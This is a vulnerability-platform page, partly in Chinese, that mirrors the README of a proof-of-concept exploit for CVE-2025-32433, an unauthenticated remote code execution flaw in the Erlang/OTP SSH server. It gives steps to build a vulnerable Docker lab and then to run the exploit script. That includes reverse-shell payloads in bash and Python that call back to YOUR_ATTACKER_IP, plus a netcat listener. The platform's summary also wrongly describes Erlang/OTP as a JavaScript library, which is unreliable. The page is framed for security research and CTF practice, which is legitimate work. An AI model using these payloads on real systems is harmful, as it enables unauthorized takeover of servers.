漏洞平台

POC详情： 33b0c61a64e17d8a715a9cf02dcaf34c2c38b4a3

来源

https://github.com/NiteeshPujari/CVE-2025-32433-PoC

关联漏洞

标题： Erlang/OTP 访问控制错误漏洞 (CVE-2025-32433)
描述：Erlang/OTP是Erlang/OTP开源的一个JavaScript编写的处理处理异常的库。该库可以捕捉node.js内置API引发的异常。 Erlang/OTP 27.3.3之前版本存在访问控制错误漏洞，该漏洞源于SSH协议消息处理缺陷，可能导致远程代码执行。

描述

CVE-2025-32433 PoC: Unauthenticated Remote Code Execution (RCE) in Erlang/OTP SSH. Includes a vulnerable Docker environment and an interactive Python exploit script for ethical hacking & CTF challenges.

介绍

# CVE-2025-32433: Erlang/OTP SSH Unauthenticated RCE PoC

![CVE-2025-32433](https://img.shields.io/badge/CVE-2025--32433-critical)

This repository contains a Proof-of-Concept (PoC) for CVE-2025-32433, a critical unauthenticated Remote Code Execution (RCE) vulnerability affecting the SSH server implementation in Erlang/Open Telecom Platform (OTP). This PoC is designed for educational purposes, security research, and Capture The Flag (CTF) challenges.

> ### ⚠️ Disclaimer - For Educational & Ethical Use Only ⚠️
> This PoC is provided strictly for educational and ethical hacking purposes. It is intended for use in controlled environments, such as isolated virtual machines or CTF platforms, where you have explicit permission to perform security testing.
>
> **DO NOT** use this PoC against any system you do not own or have explicit, written authorization to test. Unauthorized access or exploitation of computer systems is illegal and unethical. The author and maintainers of this repository are not responsible for any misuse or damage caused by this code.

---

### 📊 Vulnerability Overview

| Attribute | Details |
| :--- | :--- |
| **CVE ID** | `CVE-2025-32433` |
| **Vulnerability Type** | Unauthenticated Remote Code Execution (RCE) |
| **CVSS v3.1 Score** | `10.0` (Critical) |
| **Affected Software** | Erlang/OTP SSH server (`ssh`) |
| **Affected Versions** | OTP-27.3.2 and earlier<br>OTP-26.2.5.10 and earlier<br>OTP-25.3.2.19 and earlier<br>Versions from OTP 17.0 and older |
| **Patched Versions** | `OTP-27.3.3`, `OTP-26.2.5.11`, `OTP-25.3.2.20` |

### Technical Details

The vulnerability lies in how the Erlang/OTP SSH server processes SSH protocol messages during the pre-authentication phase. Specifically, the server fails to properly enforce the SSH protocol sequence, allowing a remote, unauthenticated attacker to send crafted `SSH_MSG_CHANNEL_OPEN` and `SSH_MSG_CHANNEL_REQUEST` messages. This enables the attacker to open a session channel and execute arbitrary Erlang commands (which can, in turn, execute system commands) without providing valid credentials. If the SSH daemon runs with elevated privileges (e.g., as `root`), successful exploitation can lead to full system compromise.

---

### 🛠️ Setup: Building the Vulnerable Environment (Docker)

The easiest way to set up a vulnerable Erlang/OTP SSH server is by using the provided `Dockerfile`.

1.  **Clone this repository:**
    ```bash
    git clone https://github.com/NiteeshPujari/CVE-2025-32433-PoC.git
    cd CVE-2025-32433-PoC
    ```

2.  **Build the Docker image:**
    This command compiles a vulnerable version of Erlang/OTP (`OTP-26.2.5.10`) and configures the SSH server.
    ```bash
    docker build -t erlang-ssh-vulnerable .
    ```

3.  **Run the vulnerable server container:**
    This starts the Erlang/OTP SSH server in the background, listening on port `2222`.
    ```bash
    docker run -d --name erlang-ssh-target -p 2222:2222 erlang-ssh-vulnerable
    ```
    * `-d`: Runs the container in detached mode.
    * `--name erlang-ssh-target`: Assigns a name to the container for easy management.
    * `-p 2222:2222`: Maps host port `2222` to container port `2222`.

4.  **Verify the container is running:**
    ```bash
    docker ps
    ```

---

### 🚀 Usage: Running the PoC Script

The `cve_2025_32433_exploit.py` script can be run interactively or with command-line arguments.

#### Interactive Mode

If you run the script without arguments, it will prompt you for the necessary information.

1.  **Ensure the vulnerable Docker container is running.**
2.  **Run the Python PoC script:**
    ```bash
    python3 cve_2025_32433_exploit.py
    ```
3.  **Follow the interactive prompts:**
    The script will ask for:
    * **Target IP address:** (e.g., `127.0.0.1` if targeting Docker on the same host).
    * **Target port:** (e.g., `2222`).
    * **Command to execute:** (Leave blank for the default test command).

#### Example 1: Test RCE by Creating a File

This is the default behavior if you leave the command prompt blank in interactive mode. It creates a file `/tmp/note.txt` on the target.

1.  **Run the exploit:**
    ```bash
    python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'file:write_file("/tmp/note.txt", "Exploit Ran!").'
    ```
2.  **Verify the file was created on the target:**
    ```bash
    docker exec -it erlang-ssh-target cat /tmp/note.txt
    ```
    You should see the output: `Exploit Ran!`

#### Example 2: Getting a Reverse Shell

To get a reverse shell, you must provide a payload that connects back to a listener on your machine.

1.  **Start a Netcat listener** on your attacking machine (e.g., Kali Linux) on your chosen port.
    ```bash
    nc -lvnp 4444
    ```
    > **Important:** Ensure your firewall (e.g., `ufw`) on your attacking machine allows inbound connections on this port.
    > `sudo ufw allow 4444/tcp`

2.  **Run the PoC script** with the reverse shell payload. Replace `YOUR_ATTACKER_IP` with your machine's IP address.

    * **Bash Reverse Shell:**
        ```bash
        python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'os:cmd("bash -i >& /dev/tcp/YOUR_ATTACKER_IP/4444 0>&1").'
        ```

    * **Python Reverse Shell (often more reliable):**
        ```bash
        python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'os:cmd("python3 -c ''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_ATTACKER_IP\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);''").'
        ```

3.  Check your Netcat listener. You should receive a connection and have a shell on the target container.

---

### 🧹 Cleanup

To stop and remove the Docker container and image:

```bash
# Stop and remove the container
docker stop erlang-ssh-target
docker rm erlang-ssh-target

# Optional: remove the image as well
docker rmi erlang-ssh-vulnerable

文件快照


 [4.0K]  /data/pocs/33b0c61a64e17d8a715a9cf02dcaf34c2c38b4a3
├── [ 13K]  cve_2025_32433_exploit.py
├── [ 886]  Dockerfile
├── [5.9K]  README.md
└── [ 675]  ssh_server.erl

0 directories, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。